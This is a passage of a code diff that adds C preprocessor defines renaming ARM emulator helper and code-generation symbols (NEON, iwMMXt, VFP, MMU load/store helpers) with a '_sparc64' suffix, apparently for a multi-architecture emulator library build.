gen_neon_rsb gen_neon_rsb_sparc64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_sparc64 +#define gen_neon_subl gen_neon_subl_sparc64 +#define gen_neon_trn_u16 gen_neon_trn_u16_sparc64 +#define gen_neon_trn_u8 gen_neon_trn_u8_sparc64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_sparc64 +#define gen_neon_unzip gen_neon_unzip_sparc64 +#define gen_neon_widen gen_neon_widen_sparc64 +#define gen_neon_zip gen_neon_zip_sparc64 +#define gen_new_label gen_new_label_sparc64 
+#define gen_nop_hint gen_nop_hint_sparc64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_sparc64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_sparc64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_sparc64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_sparc64 +#define 
gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_sparc64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_sparc64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_sparc64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_sparc64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_sparc64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_sparc64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_sparc64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_sparc64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_sparc64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_sparc64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_sparc64 +#define 
gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_sparc64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_sparc64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_sparc64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_sparc64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_sparc64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_sparc64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_sparc64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_sparc64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_sparc64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_sparc64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_sparc64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_sparc64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_sparc64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_sparc64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_sparc64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_sparc64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_sparc64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_sparc64 +#define 
gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_sparc64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_sparc64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_sparc64 +#define gen_rev16 gen_rev16_sparc64 +#define gen_revsh gen_revsh_sparc64 +#define gen_rfe gen_rfe_sparc64 +#define gen_sar gen_sar_sparc64 +#define gen_sbc_CC gen_sbc_CC_sparc64 +#define gen_sbfx gen_sbfx_sparc64 +#define gen_set_CF_bit31 gen_set_CF_bit31_sparc64 +#define gen_set_condexec gen_set_condexec_sparc64 +#define gen_set_cpsr gen_set_cpsr_sparc64 +#define gen_set_label gen_set_label_sparc64 +#define gen_set_pc_im gen_set_pc_im_sparc64 +#define gen_set_psr gen_set_psr_sparc64 +#define gen_set_psr_im gen_set_psr_im_sparc64 +#define gen_shl gen_shl_sparc64 +#define gen_shr gen_shr_sparc64 +#define gen_smc gen_smc_sparc64 +#define gen_smul_dual gen_smul_dual_sparc64 +#define gen_srs gen_srs_sparc64 +#define gen_ss_advance gen_ss_advance_sparc64 +#define gen_step_complete_exception gen_step_complete_exception_sparc64 +#define gen_store_exclusive gen_store_exclusive_sparc64 +#define gen_storeq_reg gen_storeq_reg_sparc64 +#define gen_sub_carry gen_sub_carry_sparc64 +#define gen_sub_CC gen_sub_CC_sparc64 +#define gen_subq_msw gen_subq_msw_sparc64 +#define gen_swap_half gen_swap_half_sparc64 +#define gen_thumb2_data_op gen_thumb2_data_op_sparc64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_sparc64 +#define gen_ubfx gen_ubfx_sparc64 +#define gen_vfp_abs gen_vfp_abs_sparc64 +#define gen_vfp_add gen_vfp_add_sparc64 +#define gen_vfp_cmp gen_vfp_cmp_sparc64 +#define gen_vfp_cmpe gen_vfp_cmpe_sparc64 +#define gen_vfp_div gen_vfp_div_sparc64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_sparc64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_sparc64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_sparc64 +#define gen_vfp_ld gen_vfp_ld_sparc64 +#define gen_vfp_mrs gen_vfp_mrs_sparc64 +#define gen_vfp_msr gen_vfp_msr_sparc64 +#define gen_vfp_mul gen_vfp_mul_sparc64 +#define 
gen_vfp_neg gen_vfp_neg_sparc64 +#define gen_vfp_shto gen_vfp_shto_sparc64 +#define gen_vfp_sito gen_vfp_sito_sparc64 +#define gen_vfp_slto gen_vfp_slto_sparc64 +#define gen_vfp_sqrt gen_vfp_sqrt_sparc64 +#define gen_vfp_st gen_vfp_st_sparc64 +#define gen_vfp_sub gen_vfp_sub_sparc64 +#define gen_vfp_tosh gen_vfp_tosh_sparc64 +#define gen_vfp_tosi gen_vfp_tosi_sparc64 +#define gen_vfp_tosiz gen_vfp_tosiz_sparc64 +#define gen_vfp_tosl gen_vfp_tosl_sparc64 +#define gen_vfp_touh gen_vfp_touh_sparc64 +#define gen_vfp_toui gen_vfp_toui_sparc64 +#define gen_vfp_touiz gen_vfp_touiz_sparc64 +#define gen_vfp_toul gen_vfp_toul_sparc64 +#define gen_vfp_uhto gen_vfp_uhto_sparc64 +#define gen_vfp_uito gen_vfp_uito_sparc64 +#define gen_vfp_ulto gen_vfp_ulto_sparc64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_sparc64 +#define get_clock get_clock_sparc64 +#define get_clock_realtime get_clock_realtime_sparc64 +#define get_constraint_priority get_constraint_priority_sparc64 +#define get_float_exception_flags get_float_exception_flags_sparc64 +#define get_float_rounding_mode get_float_rounding_mode_sparc64 +#define get_fpstatus_ptr get_fpstatus_ptr_sparc64 +#define get_level1_table_address get_level1_table_address_sparc64 +#define get_mem_index get_mem_index_sparc64 +#define get_next_param_value get_next_param_value_sparc64 +#define get_opt_name get_opt_name_sparc64 +#define get_opt_value get_opt_value_sparc64 +#define get_page_addr_code get_page_addr_code_sparc64 +#define get_param_value get_param_value_sparc64 +#define get_phys_addr get_phys_addr_sparc64 +#define get_phys_addr_lpae get_phys_addr_lpae_sparc64 +#define get_phys_addr_mpu get_phys_addr_mpu_sparc64 +#define get_phys_addr_v5 get_phys_addr_v5_sparc64 +#define get_phys_addr_v6 get_phys_addr_v6_sparc64 +#define get_system_memory get_system_memory_sparc64 +#define get_ticks_per_sec get_ticks_per_sec_sparc64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_sparc64 +#define _GLOBAL_OFFSET_TABLE_ 
_GLOBAL_OFFSET_TABLE__sparc64 +#define gt_cntfrq_access gt_cntfrq_access_sparc64 +#define gt_cnt_read gt_cnt_read_sparc64 +#define gt_cnt_reset gt_cnt_reset_sparc64 +#define gt_counter_access gt_counter_access_sparc64 +#define gt_ctl_write gt_ctl_write_sparc64 +#define gt_cval_write gt_cval_write_sparc64 +#define gt_get_countervalue gt_get_countervalue_sparc64 +#define gt_pct_access gt_pct_access_sparc64 +#define gt_ptimer_access gt_ptimer_access_sparc64 +#define gt_recalc_timer gt_recalc_timer_sparc64 +#define gt_timer_access gt_timer_access_sparc64 +#define gt_tval_read gt_tval_read_sparc64 +#define gt_tval_write gt_tval_write_sparc64 +#define gt_vct_access gt_vct_access_sparc64 +#define gt_vtimer_access gt_vtimer_access_sparc64 +#define guest_phys_blocks_free guest_phys_blocks_free_sparc64 +#define guest_phys_blocks_init guest_phys_blocks_init_sparc64 +#define handle_vcvt handle_vcvt_sparc64 +#define handle_vminmaxnm handle_vminmaxnm_sparc64 +#define handle_vrint handle_vrint_sparc64 +#define handle_vsel handle_vsel_sparc64 +#define has_help_option has_help_option_sparc64 +#define have_bmi1 have_bmi1_sparc64 +#define have_bmi2 have_bmi2_sparc64 +#define hcr_write hcr_write_sparc64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_sparc64 +#define helper_add_saturate helper_add_saturate_sparc64 +#define helper_add_setq helper_add_setq_sparc64 +#define helper_add_usaturate helper_add_usaturate_sparc64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_sparc64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_sparc64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_sparc64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_sparc64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_sparc64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_sparc64 +#define helper_be_stl_mmu helper_be_stl_mmu_sparc64 +#define helper_be_stq_mmu helper_be_stq_mmu_sparc64 +#define 
helper_be_stw_mmu helper_be_stw_mmu_sparc64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_sparc64 +#define helper_clz_arm helper_clz_arm_sparc64 +#define helper_cpsr_read helper_cpsr_read_sparc64 +#define helper_cpsr_write helper_cpsr_write_sparc64 +#define helper_crc32_arm helper_crc32_arm_sparc64 +#define helper_crc32c helper_crc32c_sparc64 +#define helper_crypto_aese helper_crypto_aese_sparc64 +#define helper_crypto_aesmc helper_crypto_aesmc_sparc64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_sparc64 +#define helper_crypto_sha1h helper_crypto_sha1h_sparc64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_sparc64 +#define helper_crypto_sha256h helper_crypto_sha256h_sparc64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_sparc64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_sparc64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_sparc64 +#define helper_dc_zva helper_dc_zva_sparc64 +#define helper_double_saturate helper_double_saturate_sparc64 +#define helper_exception_internal helper_exception_internal_sparc64 +#define helper_exception_return helper_exception_return_sparc64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_sparc64 +#define helper_get_cp_reg helper_get_cp_reg_sparc64 +#define helper_get_cp_reg64 helper_get_cp_reg64_sparc64 +#define helper_get_r13_banked helper_get_r13_banked_sparc64 +#define helper_get_user_reg helper_get_user_reg_sparc64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_sparc64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_sparc64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_sparc64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_sparc64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_sparc64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_sparc64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_sparc64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_sparc64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_sparc64 +#define helper_iwmmxt_addub 
helper_iwmmxt_addub_sparc64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_sparc64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_sparc64 +#define helper_iwmmxt_align helper_iwmmxt_align_sparc64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_sparc64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_sparc64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_sparc64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_sparc64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_sparc64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_sparc64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_sparc64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_sparc64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_sparc64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_sparc64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_sparc64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_sparc64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_sparc64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_sparc64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_sparc64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_sparc64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_sparc64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_sparc64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_sparc64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_sparc64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_sparc64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_sparc64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_sparc64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_sparc64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_sparc64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_sparc64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_sparc64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_sparc64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_sparc64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_sparc64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_sparc64 
+#define helper_iwmmxt_minul helper_iwmmxt_minul_sparc64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_sparc64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_sparc64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_sparc64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_sparc64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_sparc64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_sparc64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_sparc64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_sparc64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_sparc64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_sparc64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_sparc64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_sparc64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_sparc64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_sparc64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_sparc64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_sparc64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_sparc64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_sparc64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_sparc64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_sparc64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_sparc64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_sparc64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_sparc64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_sparc64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_sparc64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_sparc64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_sparc64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_sparc64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_sparc64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_sparc64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_sparc64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_sparc64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_sparc64 +#define helper_iwmmxt_subnb 
helper_iwmmxt_subnb_sparc64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_sparc64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_sparc64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_sparc64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_sparc64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_sparc64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_sparc64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_sparc64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_sparc64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_sparc64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_sparc64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_sparc64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_sparc64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_sparc64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_sparc64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_sparc64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_sparc64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_sparc64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_sparc64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_sparc64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_sparc64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_sparc64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_sparc64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_sparc64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_sparc64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_sparc64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_sparc64 +#define helper_ldb_cmmu helper_ldb_cmmu_sparc64 +#define helper_ldb_mmu helper_ldb_mmu_sparc64 +#define helper_ldl_cmmu helper_ldl_cmmu_sparc64 +#define helper_ldl_mmu helper_ldl_mmu_sparc64 +#define helper_ldq_cmmu helper_ldq_cmmu_sparc64 +#define helper_ldq_mmu helper_ldq_mmu_sparc64 +#define helper_ldw_cmmu helper_ldw_cmmu_sparc64 +#define 
helper_ldw_mmu helper_ldw_mmu_sparc64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_sparc64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_sparc64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_sparc64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_sparc64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_sparc64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_sparc64 +#define helper_le_stl_mmu helper_le_stl_mmu_sparc64 +#define helper_le_stq_mmu helper_le_stq_mmu_sparc64 +#define helper_le_stw_mmu helper_le_stw_mmu_sparc64 +#define helper_msr_i_pstate helper_msr_i_pstate_sparc64 +#define helper_neon_abd_f32 helper_neon_abd_f32_sparc64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_sparc64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_sparc64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_sparc64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_sparc64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_sparc64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_sparc64 +#define helper_neon_abd_s16 helper_neon_abd_s16_sparc64 +#define helper_neon_abd_s32 helper_neon_abd_s32_sparc64 +#define helper_neon_abd_s8 helper_neon_abd_s8_sparc64 +#define helper_neon_abd_u16 helper_neon_abd_u16_sparc64 +#define helper_neon_abd_u32 helper_neon_abd_u32_sparc64 +#define helper_neon_abd_u8 helper_neon_abd_u8_sparc64 +#define helper_neon_abs_s16 helper_neon_abs_s16_sparc64 +#define helper_neon_abs_s8 helper_neon_abs_s8_sparc64 +#define helper_neon_acge_f32 helper_neon_acge_f32_sparc64 +#define helper_neon_acge_f64 helper_neon_acge_f64_sparc64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_sparc64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_sparc64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_sparc64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_sparc64 +#define helper_neon_addl_u16 
helper_neon_addl_u16_sparc64 +#define helper_neon_addl_u32 helper_neon_addl_u32_sparc64 +#define helper_neon_add_u16 helper_neon_add_u16_sparc64 +#define helper_neon_add_u8 helper_neon_add_u8_sparc64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_sparc64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_sparc64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_sparc64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_sparc64 +#define helper_neon_cge_f32 helper_neon_cge_f32_sparc64 +#define helper_neon_cge_s16 helper_neon_cge_s16_sparc64 +#define helper_neon_cge_s32 helper_neon_cge_s32_sparc64 +#define helper_neon_cge_s8 helper_neon_cge_s8_sparc64 +#define helper_neon_cge_u16 helper_neon_cge_u16_sparc64 +#define helper_neon_cge_u32 helper_neon_cge_u32_sparc64 +#define helper_neon_cge_u8 helper_neon_cge_u8_sparc64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_sparc64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_sparc64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_sparc64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_sparc64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_sparc64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_sparc64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_sparc64 +#define helper_neon_cls_s16 helper_neon_cls_s16_sparc64 +#define helper_neon_cls_s32 helper_neon_cls_s32_sparc64 +#define helper_neon_cls_s8 helper_neon_cls_s8_sparc64 +#define helper_neon_clz_u16 helper_neon_clz_u16_sparc64 +#define helper_neon_clz_u8 helper_neon_clz_u8_sparc64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_sparc64 